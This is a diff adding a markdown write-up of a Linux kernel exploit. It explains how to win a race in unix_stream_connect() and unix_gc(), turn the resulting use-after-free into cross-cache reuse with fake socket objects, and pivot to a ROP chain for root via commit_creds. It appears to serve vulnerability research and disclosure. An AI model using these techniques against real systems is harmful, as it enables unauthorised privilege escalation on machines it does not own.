|
| 1 | +## Triggering the race condition |
| 2 | + |
| 3 | +In this vulnerability we have two race windows. |
| 4 | +The first one is in unix_stream_connect(): |
| 5 | + |
| 6 | +``` |
| 7 | +static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr, |
| 8 | + int addr_len, int flags) |
| 9 | +{ |
| 10 | +... |
| 11 | +
|
| 12 | + unix_peer(sk) = newsk; |
| 13 | +
|
| 14 | +[window 1 start] |
| 15 | + unix_state_unlock(sk); |
| 16 | +
|
| 17 | + /* take ten and send info to listening sock */ |
| 18 | + spin_lock(&other->sk_receive_queue.lock); |
| 19 | +[window 1 end] |
| 20 | +
|
| 21 | + __skb_queue_tail(&other->sk_receive_queue, skb); |
| 22 | + spin_unlock(&other->sk_receive_queue.lock); |
| 23 | +... |
| 24 | +``` |
| 25 | + |
| 26 | +This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. |
| 27 | + |
| 28 | +We have to use the other CPU available to perform 2 operations during this window: |
| 29 | +1. Send the victim socket through this connecting socket. |
| 30 | +2. Close the victim socket |
| 31 | +3. Trigger garbage collection and run unix_gc() until the start of window 2. |
| 32 | + |
| 33 | +If we start too early, our send will fail because the socket is not connected yet and the exploit will fail. |
| 34 | + |
| 35 | +Second window is in the unix_gc function: |
| 36 | +``` |
| 37 | +void unix_gc(void) |
| 38 | +{ |
| 39 | +... |
| 40 | + list_for_each_entry(u, &gc_candidates, link) |
| 41 | + { |
| 42 | + scan_children(&u->sk, dec_inflight, NULL); |
| 43 | + } |
| 44 | +
|
| 45 | +[window 2 start] |
| 46 | + /* Restore the references for children of all candidates, |
| 47 | + * which have remaining references. Do this recursively, so |
| 48 | + * only those remain, which form cyclic references. |
| 49 | + * |
| 50 | + * Use a "cursor" link, to make the list traversal safe, even |
| 51 | + * though elements might be moved about. |
| 52 | + */ |
| 53 | + list_add(&cursor, &gc_candidates); |
| 54 | +[window 2 end] |
| 55 | + while (cursor.next != &gc_candidates) { |
| 56 | + u = list_entry(cursor.next, struct unix_sock, link); |
| 57 | +
|
| 58 | + /* Move cursor to after the current position. */ |
| 59 | + list_move(&cursor, &u->link); |
| 60 | +
|
| 61 | + if (atomic_long_read(&u->inflight) > 0) { |
| 62 | + list_move_tail(&u->link, ¬_cycle_list); |
| 63 | + __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags); |
| 64 | + scan_children(&u->sk, inc_inflight_move_tail, NULL); |
| 65 | + } |
| 66 | + } |
| 67 | + list_del(&cursor); |
| 68 | +
|
| 69 | +
|
| 70 | +``` |
| 71 | + |
| 72 | +For the vulnerability to be triggered two conditions have to be met: |
| 73 | +1. The first scan_children() can not see the embryo in the receive queue of the server socket |
| 74 | +2. The second scan_children() has to see the embryo. |
| 75 | + |
| 76 | +This causes a decrement/increment mismatch and the resulting use-after-free. |
| 77 | + |
| 78 | +In other words, window 2 has run inside the window 1 of unix_stream_connect(). |
| 79 | + |
| 80 | + |
| 81 | +To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible. |
| 82 | +To do that we use a well-known timerfd technique invented by Jann Horn. |
| 83 | +The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows) |
| 84 | +of epoll watches to this timerfd to make the time needed to handle the interrupt longer. |
| 85 | +For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html). |
| 86 | + |
| 87 | +Here's the triggering sequence (we use 2 CPUs, CPU1 is executing child_send() thread): |
| 88 | + |
| 89 | +| CPU 0 | CPU 1 | |
| 90 | +| -------- | -------- | |
| 91 | +| arms timer 1 to trigger after a delay | - | |
| 92 | +| calls connect() on the client socket | - | |
| 93 | +| unix_stream_connect() runs until the start of window 1 | - | |
| 94 | +| timer 1 is triggered during window 1 | - | |
| 95 | +| timer goes through all epoll notifications | sends victim socket through the client socket | |
| 96 | +| ... | closes victim socket | |
| 97 | +| ... | arms timer 2 to trigger after a delay | |
| 98 | +| ... | closes another socket to trigger unix_gc() | |
| 99 | +| ... | unix_gc() runs until the start of window 2 | |
| 100 | +| ... | timer 2 is triggered during window 2 | |
| 101 | +| timer 1 handler ends | timer goes through all epoll notifications | |
| 102 | +| window 1 ends, embryo is added to the receive queue | ... | |
| 103 | +| - | timer 2 handler ends, window 2 ends | |
| 104 | +| - | second scan_children() executes inc_inflight_move_tail() on the victim socket | |
| 105 | + |
| 106 | +## Exploiting the use-after-free |
| 107 | + |
| 108 | +At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. |
| 109 | +Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. |
| 110 | +In case of unix sockets, struct sock is allocated from a separate kmalloc cached called 'UNIX'. On our target one slab takes a order 2 (size 0x4000) page and fits 15 objects. |
| 111 | + |
| 112 | +To be able to exploit the use-after-free we have to cause the slab containing our victim objects to be discarded and returned to the page allocator. |
| 113 | +This is done using standard cross-cache techniques: |
| 114 | +1. Free all objects of the given slab |
| 115 | +2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded |
| 116 | + |
| 117 | +However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit. |
| 118 | + |
| 119 | +Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt. |
| 120 | +This is done in the get_fresh_unix() function. |
| 121 | +One problem that we have to solve is that when a unix socket an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab. |
| 122 | + |
| 123 | +To solve this we first allocate some netlinks objects, which do not have their own dedicated sock object cache, so the only order 2 page allocation comes from sock_inode_cache. |
| 124 | +This allows us to get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab. |
| 125 | + |
| 126 | +After the slab page is returned to the page allocator we can easily reallocate it using an xattr of size 0x4000 - xattrs larger than 0x2000 are allocated directly from the page allocator. |
| 127 | + |
| 128 | +## Getting RIP control |
| 129 | + |
| 130 | +At this point we have a struct sock object linked in the gc_inflight_list that we can fill with arbitrary data. |
| 131 | +This list is used by unix_gc() and if we are able to craft a fake sock object convincing enough that unix_gc() will be able to traverse the gc_inflight_list and move sk_buff objects from our sock object to the 'hitlist' that will be passed to the skb_queue_purge(). |
| 132 | + |
| 133 | +unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers. |
| 134 | +Also, properties such as sk_socket->file are accessed, meaning we have to also craft related objects (or at least their part) like struct socket, struct file, struct inode and finally sk_buff - this object will contain function pointer giving us RIP control and the ROP chain. |
| 135 | + |
| 136 | +But first, we need a place with a known address to store all these objects. |
| 137 | + |
| 138 | +### Crafting objects in kernel memory |
| 139 | + |
| 140 | +The fake kernel objects were sprayed into the physical memory by creating a lot of large tmpfs xattrs and referenced by using a direct mapping address - more details about that can be found in the [novel techniques](novel-techniques.md) section. |
| 141 | + |
| 142 | +The first fake socket to replace the victim object on the gc_inflight_list is prepared in prepare_sock() and has pointers to the ones prepared in prepare_more_socks(). These are actually allocated at the very beginning of the exploit - we can do it because their location in memory is known in advance. |
| 143 | + |
| 144 | +### Triggering the sk_buff destructor to get RIP control |
| 145 | + |
| 146 | +When an inflight socket is chosen to be released by the unix_gc() the sk_buff carrying it is removed from the sk_receive_queue and linked into the 'hitlist' and then skb_queue_purge() is called on that list: |
| 147 | +``` |
| 148 | +static inline void __skb_queue_purge(struct sk_buff_head *list) |
| 149 | +{ |
| 150 | + struct sk_buff *skb; |
| 151 | + while ((skb = __skb_dequeue(list)) != NULL) |
| 152 | + kfree_skb(skb); |
| 153 | +} |
| 154 | +``` |
| 155 | + |
| 156 | +If this is the last reference to a given skb, skb_release_head_state() is eventually called: |
| 157 | +``` |
| 158 | +void skb_release_head_state(struct sk_buff *skb) |
| 159 | +{ |
| 160 | + skb_dst_drop(skb); |
| 161 | + if (skb->destructor) { |
| 162 | + DEBUG_NET_WARN_ON_ONCE(in_hardirq()); |
| 163 | + skb->destructor(skb); |
| 164 | + } |
| 165 | +#if IS_ENABLED(CONFIG_NF_CONNTRACK) |
| 166 | + nf_conntrack_put(skb_nfct(skb)); |
| 167 | +#endif |
| 168 | + skb_ext_put(skb); |
| 169 | +} |
| 170 | +``` |
| 171 | + |
| 172 | +Because we control all the contents of the sk_buff object we can make sure the destructor will be called. |
| 173 | + |
| 174 | +## Pivot to ROP |
| 175 | + |
| 176 | +When the destructor is called, RDI contains a pointer to our fake sk_buff object. |
| 177 | +First 16 bytes of this objects are used the the list head, so we can't start our ROP there. |
| 178 | + |
| 179 | +Following chain of gadgets allows us to pivot to rdi+0x10 where our ROP chain starts: |
| 180 | + |
| 181 | +``` |
| 182 | +mov r8,QWORD PTR [rdi+0xc8] |
| 183 | +mov eax,0x1 |
| 184 | +test r8,r8 |
| 185 | +je 0xffffffff8218aac1 |
| 186 | +mov rsi,rdi |
| 187 | +mov rcx,r14 |
| 188 | +mov rdi,rbp |
| 189 | +mov rdx,r15 |
| 190 | +call 0xffffffff8242ca60 <__x86_indirect_thunk_r8> |
| 191 | +``` |
| 192 | + |
| 193 | +This copies RDI to RSI |
| 194 | + |
| 195 | +``` |
| 196 | +push rsi |
| 197 | +jmp qword [rsi-0x70] |
| 198 | +``` |
| 199 | + |
| 200 | +This pushes RSI to the stack. We can safely use -0x70 offset because our sk_buff is a part of a larger allocation |
| 201 | + |
| 202 | +Finally: |
| 203 | + |
| 204 | +``` |
| 205 | +pop rsp |
| 206 | +pop rbp |
| 207 | +pop rbx |
| 208 | +ret |
| 209 | +``` |
| 210 | + |
| 211 | +Two pops at the end move RSP after the list_head head of sk_buff |
| 212 | + |
| 213 | +## Second pivot |
| 214 | + |
| 215 | +There is not much space at the beginning of the sk_buff - next used field is at 0x38 offset, so we have space for only 3 gadgets, but this is enough to pivot to a larger space with a simple pop rsp ; ret |
| 216 | + |
| 217 | +## Privilege escalation |
| 218 | + |
| 219 | +The second stage of the ROP does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to the userspace. |
0 commit comments